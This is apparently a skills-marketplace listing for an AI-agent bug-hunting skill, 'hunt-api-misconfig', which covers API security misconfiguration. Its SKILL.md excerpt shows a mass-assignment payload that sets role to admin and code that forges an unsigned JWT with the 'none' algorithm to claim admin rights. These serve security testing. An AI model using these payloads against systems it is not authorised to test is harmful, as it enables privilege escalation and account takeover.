Skills

hunt-api-misconfig

Installation
SKILL.md

12. API SECURITY MISCONFIGURATION

Mass Assignment

User.update(req.body)  // body has {"role": "admin"} → privilege escalation

JWT None Algorithm

header = {"alg": "none", "typ": "JWT"}
payload = {"sub": 1, "role": "admin"}
token = base64(header) + "." + base64(payload) + "."  # no signature
Installs
33
Repository
elementalsouls/…ughunter
GitHub Stars
2.6K
First Seen
May 24, 2026
Security Audits
Gen Agent Trust HubPass
SocketWarn
SnykFail
hunt-api-misconfig — elementalsouls/claude-bughunter